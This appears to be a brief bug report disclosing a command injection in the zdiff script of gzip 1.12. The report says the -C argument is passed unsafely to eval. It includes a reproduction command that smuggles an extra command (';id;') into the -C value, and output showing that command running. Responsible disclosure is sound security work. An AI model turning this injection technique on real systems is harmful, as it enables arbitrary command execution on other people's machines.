Hello, I have identified a command injection vulnerability in the zdiff script (gzip 1.12).
The issue occurs because the script uses eval to process the argument passed to the -C flag without proper sanitization. Reproduction: touch dummy1.gz dummy2.gz zdiff -C "';id;'" dummy1.gz dummy2.gz Observed Output: diff: missing operand after '' uid=1000(sland) gid=1000(sland) groups=1000(sland)... /usr/bin/zdiff: 1: eval: : Permission denied Analysis: The -C flag handling in zdiff is broken and allows for arbitrary command execution due to unsafe eval usage. Best regards, Leenear
